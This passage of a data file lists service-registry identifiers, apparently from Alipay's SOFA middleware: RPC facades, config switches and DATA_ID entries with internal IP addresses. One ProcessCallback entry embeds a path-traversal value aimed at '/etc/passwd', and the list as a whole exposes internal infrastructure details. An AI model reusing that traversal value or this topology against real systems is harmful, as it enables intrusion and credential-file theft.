OUTER","Alipay.customscenter:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInOsValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:datafin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.wireless.IsvCorpAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.service.loan.impl.support.drm.MiniLoanOperateDrm.cmdProdTransStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.CifPasswordVerifyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.globalsite.facade.api.util.MerchantSceneCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestPreIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opssla.common.service.facade.ResourceManageFacade:1.0:ropcn@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.116.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:gmportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcreditauthcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkdepbuss.common.bkmmbuss.facade.api.AccountInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zprod.common.service.usable.RecordUsableService:1.0:zhubbatchalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeviceprod.common.service.facade.process.ProcessEngineRulesQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.235.82#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmResourceTrigger.errorCodeMatchInstsStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","riskpluscore.common.service.facade.miniprogram.MiniProgramSearchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antmember.common.service.facade.membertask.MemberTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.SkylineFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisionx.engine.common.api.VerifyService:1.0:pucprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.paramTaskRP,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.yebcore.common.facade.service.query.TransOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.178.255#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:finlinkboss_antProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.trade.settingendowment.SettingEndowmentChangeMaturityWayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydataproc:name=com.alipay.securitydata.common.service.integration.antq.impl.drm.AntQSendResource.lbsTestProcessSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.248.82#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.123.17#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:mcardcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.common.service.facade.CqcBranchRuleQueryFacade:1.0:ibbcmngService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ngfeguard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assetinsight.facade.api.sceneanalysis.SceneAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.olive.facade.api.common.OliveDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.stdtrustee.BailAuthService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kwlib:name=com.alipay.fc.process.bp.engine.job.drm.JobDrmAdapter.config,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-oneapitwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.cryptprod.common.service.facade.HsmPinCryptoFacade:1.0:@fccryptprod_service_unique_id@#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accreditcore.common.service.facade.CreditAccountOperateFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zpaas:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_C_POINTPROD_CACHE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.trsdesk.common.service.facade.entity.RiskEntityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.StockAnnouncementFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaimdecision.common.service.InsSurveyDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.117.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturelib.common.facade.service.DataViewProtocolQueryService:1.0:LINGKAI_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apyunqing.common.service.facade.resource.ResourceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acticketcore.kernel.common.service.facade.AbossFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservicesinspect.biz.shared.feature.detect.DetectItemCheck:1.0:contentDetectItemCheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.170.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pccontractprod.common.service.facade.maintain.api.MaintainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.facade.ScorpioOperationLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instasset.common.service.facade.MarketingChannelQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.100.183#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.protocol-https:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.accountOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:busriskdec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.MobileMerchantH5PayService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:finstore_siteProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffintrade.common.service.facade.api.CommonTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfundtrade:name=com.alipay.finfundtrade.common.service.facade.drm.FinfundtradeGzoneDrmConfig.supportloadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.icif.service.facade.api.CertifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlinkdata.common.service.facade.riskeva.service.RiskEvaluationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordercore:name=com.alipay.ordercore.drop.level.dragonXDegradeSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.media.api.VideoRecordFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcepprod.biz.shard.handler.OperatorLdcHandler:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dassmeta.common.service.facade.meta.MetaCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@mpaasweb#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:finstore_antProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkwirelessdataportal.common.service.panda.TemplateManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_S_4007_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.cif.facade.ActionLogHisService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.openmq.common.service.facade.MessageConsumeService:1.0:instfund@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.PlacardQueryFacade:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfundprotocol:name=com.alipay.finfundprotocol.common.service.facade.drm.BankFinancingDrmConfig.openBankFinancingSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitydataproc:name=com.alipay.securitydata.common.service.integration.antq.impl.drm.AntQSendResource.antqRatio_TP_ctu_vp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dataphin.schedule.operation.platform.facade.dag.InstanceDagQueryApi:1.0:dpoperationplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.api.InstPayPriorityDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.confcenter.manager.StageAppRelationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.finscenecore.api.SceneTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instradeprod.common.service.InsClaimPolicyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.75.163#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cif.facade.ContractService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.update.AppExtInfoUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.biz.rest.DispatchProtobufRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_CONTENTMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.feed.VideoFeedFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.paidan.common.service.facade.mng.issuemold.IssueMoldQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.cscheck.RiskmngCsCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@insapportion#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","config:com.alipay.gftms.facade.api.basic.CounterPartyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.quotetradecore.common.service.facade.api.QuoteTradePriceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthclaimmng.claimcase.facade.CaseDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthmarket.common.service.facade.service.PointsTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.65.88#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.client.SystemAppInvokeService:1.0:gfacceptance@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.settleprod.service.facade.gcard.GCardDepositSetupService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfund.common.service.facade.trans.api.FundTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.darwin.common.service.facade.api.ScenarioAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.156.129#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:apyunfan@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.facade.api.GuideserviceCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.finbatch.biz.service.impl.drm.FinbatchCommonDRM.handleBatch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cfpcenter.emc.common.service.facade.api.EmergencyProcessManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:gmcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.depcore.service.facade.CommonVirtualAccountManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CifPasswordQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:gk_modfiy_name@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.anteduprod.common.service.facade.api.train.EduUserActivityInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_M_TICKET#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","HEALTHY_V2@etetestcore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:datalinkstable@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.158.49.161#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.baoxianprod.common.facade.ClaimFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexclienttrdcenter.service.facade.api.PayByFxPartnerIdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:trafficintelbiz@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.datacube.common.service.facade.ARRubbishCognitionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.pms.common.service.facade.api.MobilePosDeviceMapper:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.185.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mdatasync.common.service.facade.DCDataSyncFacade:1.0:openhome@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.186.41#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbdiscount.common.service.facade.api.RuleGroupQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.product.SharedProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.igdmc.biz.service.GlobalDataSyncService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dk.common.service.facade.transfer.DgCustomAlarmMigrationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.common.service.facade.MessageQueryFacade:1.0:openmq@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininflux.common.service.facade.gzone.InfluxHisResponseService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.processmng.core.service.drm.CommonDrm.apiOssDownload,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditmerchant.service.facade.HBActivityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirecenter.common.service.facade.api.NetworkRetailPayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openevent.facade.AppInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbpdcenter.common.service.facade.ProdSwitchQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.common.api.receipt.ReceivePayAckWithResultService:1.0:mali@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.datacontextlib.service.facade.limitcum.CumulateQueryCZoneFacade:1.0:zdataquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcsmart.biz.service.UserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilemock.common.service.facade.api.NebulaServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.necquery.common.service.arrangement.LoanARQueryNewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.biz.shared.match.repository.impl.MatchProductAggrModelRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.exception.ExceptionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:promox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.service.cacheclient.drm.ClientCacheConfigDRM.clientFlowOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.chargefront:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.eindustrycenter.common.service.facade.mng.EindustryProviderSettleMngFacade:1.0:ebppgw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_support_getYuqueTokenGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.paascore.ClusterResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditprod.service.PcreditAuthSettleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodswitch.common.service.facade.ParamQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.application:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.userResolverTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zdataservice.common.service.facade.bizOrder.BizOrderBankTradeInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:multimediabase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.code.CodeAttackRecordFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securitydata.common.service.facade.namelist.WhiteListTRService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumecenter.common.service.facade.RecoverEventQueryFacade:1.0:finfundtrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.212.143#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insassetprod.common.service.facade.PolicyEndorseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.shared.drm.PortfolioCoreSharedDrm.assetInfoIsParallel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.security.sandbox.runtime.facade.service.SecuritySandboxExperimentDataFacade:1.0:unique-6266@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.VipQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.finpwm.finpwmXTradeDataSource.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.open.facade.OpenCommentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finappconfig.common.service.facade.fdata.api.AdmFlowMapKpiResultsDiQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.core.drm.CoreOrderExecuteDRMResource.queryOrderIdsReadSlave,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbitemprod.common.service.facade.sign.KbSignProductQueryBizFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.188.46#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcactivitycore.facade.beike.BeikeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.integration.emcevent.EmcManageFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fiscore.common.service.facade.callback.DecideCallBackService:1.0:credittrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergwlite.service.facade.spi.MessageReceiveService:1.0:filecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.artweb.artProject.facade.ProjectService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.asyncGetVipDomainsIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_10.15.253.238#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.166.233.86#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antinvoice.biz.flow.service.isvorder.IsvTradeDealService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.dpchangeguardian.common.facade.change.OpsChangeApi:1.0:dpchangeguardian@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emccenter.common.service.facade.api.BusinessProcessUnitFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfinvest.facade.api.clause.FinancialTradeClauseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:antmember@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmpservice.common.service.facade.tag.StorageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linku.common.service.facade.session.SessionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lightmds.service.mds.MdsPhysicsDsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdiscountprod.common.service.facade.template.api.MerchantTemplateConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.skillgroup.SkillGroupService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iacctrans.service.facade.api.AccountLogQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.service.antg.facade.accesstoken.AgATKContactPointManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ichecker.service.facade.gateway.WorkbenchFacade:1.0:ichecker-workbench-gateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.testCacheTbase.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insptmarket.client.account.extension.AccountCardFetcherComponent:1.0:insxhbprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.web.infoview.drm.InfoviewResourceDRM.tipsCategorysJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.121.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cap.common.openapi.internal.OpenApiService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imaspmng.common.service.facade.OpsWorkOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfarm.common.service.facade.AntfarmXlightFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.starstage.facade.StarstageUserFormDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.facade.ShopPictureQueryGZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaymember.common.service.facade.config.service.StandardConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundPromoRuleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.open.facade.OpenRelationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalCrc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finsceneyebprod.common.service.facade.payAuthManage.PayAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clrfinancing.facade.api.FinancingLimitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcrulecentercommon.RuleEngineDemo:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antgraph.facade.GeaBaseMetaManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydatastudio.facade.YodaStudioService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.TokenWriteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.finauth.service.ExtAccountSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:lifeexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tunnel.engine.worker.rmi.RmiInterface:1.0.20160130:emcooperate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.biz.service.support.template.ServiceTemp